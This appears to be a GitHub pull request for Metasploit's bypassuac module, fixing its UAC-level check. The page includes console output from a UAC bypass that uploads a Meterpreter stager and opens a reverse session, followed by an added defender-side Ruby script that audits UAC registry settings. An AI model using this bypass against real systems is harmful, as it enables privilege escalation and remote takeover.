Fix UAC is not enabled, no reason to run module when UAC is enabled and ... #2470

Merged
merged 1 commit into from
Oct 6, 2013

Commits on Oct 5, 2013

  1. Fix UAC is not enabled, no reason to run module when UAC is enabled a…

    …nd vulnerable
    
    The new changes when calling uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') break UAC on Windows 7 and Windows 8 and show that UAC is not enabled when it is:
    
    Here is prior to the change on a fully patched Windows 8 machine:
    
    msf exploit(bypassuac) > exploit
    
    [*] Started reverse handler on 172.16.21.156:4444 
    [*] UAC is Enabled, checking level...
    [-] UAC is not enabled, no reason to run module
    [-] Run exploit/windows/local/ask to elevate
    msf exploit(bypassuac) > 
    
    Here's the module when running with the most recent changes that are being proposed:
    
    [*] Started reverse handler on 172.16.21.156:4444 
    [*] UAC is Enabled, checking level...
    [!] Could not determine UAC level - attempting anyways...
    [*] Checking admin status...
    [+] Part of Administrators group! Continuing...
    [*] Uploading the bypass UAC executable to the filesystem...
    [*] Meterpreter stager executable 73802 bytes long being uploaded..
    [*] Uploaded the agent to the filesystem....
    [*] Sending stage (770048 bytes) to 172.16.21.128
    [*] Meterpreter session 6 opened (172.16.21.156:4444 -> 172.16.21.128:49394) at 2013-10-05 15:49:23 -0400
    
    meterpreter > 
    
    With the new changes and not having a return on when 0 (will not always return 0 - just in certain cases where you cannot query) - it works.
    trustedsec committed Oct 5, 2013
    0799766
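
Added example, not part of this pull request or of the Metasploit code base: a defender-side audit of the same registry value that keeps "could not be read" separate from a real value of 0, which is the distinction the commit message turns on. The names `audit_uac` and `reg_int` are hypothetical, and the `EnableLUA` value and the key path are taken from Windows documentation rather than from this page.

```ruby
# Added example: defender-side audit of UAC policy values read from
# HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System.
# audit_uac and reg_int are hypothetical names, not Metasploit APIs.
CONSENT_ADMIN = {
  0 => 'elevate without prompting',
  1 => 'prompt for credentials on the secure desktop',
  2 => 'prompt for consent on the secure desktop',
  3 => 'prompt for credentials',
  4 => 'prompt for consent',
  5 => 'prompt for consent for non-Windows binaries'
}.freeze

# Registry reads may yield an Integer, a numeric String, or nil on failure.
# Returns an Integer, or nil when the value is missing or not numeric.
def reg_int(raw)
  return raw if raw.is_a?(Integer)
  text = raw.to_s.strip
  text.match?(/\A\d+\z/) ? text.to_i : nil
end

def audit_uac(values)
  lua   = reg_int(values['EnableLUA'])
  level = reg_int(values['ConsentPromptBehaviorAdmin'])
  state = if lua.nil? then :unknown
          elsif lua.zero? then :disabled
          else :enabled
          end
  findings = []
  findings << 'EnableLUA unreadable: UAC state not determined' if state == :unknown
  findings << 'EnableLUA=0: UAC is off' if state == :disabled
  unless state == :disabled
    if level.nil?
      # A failed query is reported as unknown, never folded into level 0.
      findings << 'ConsentPromptBehaviorAdmin unreadable: level not determined'
    elsif !CONSENT_ADMIN.key?(level)
      findings << "ConsentPromptBehaviorAdmin=#{level}: unrecognised value"
    elsif level.zero?
      findings << 'ConsentPromptBehaviorAdmin=0: administrators elevate without a prompt'
    end
  end
  { state: state, level: level, description: CONSENT_ADMIN[level], findings: findings }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: UAC on, prompt level could not be queried.
  p audit_uac('EnableLUA' => 1, 'ConsentPromptBehaviorAdmin' => nil)
end
```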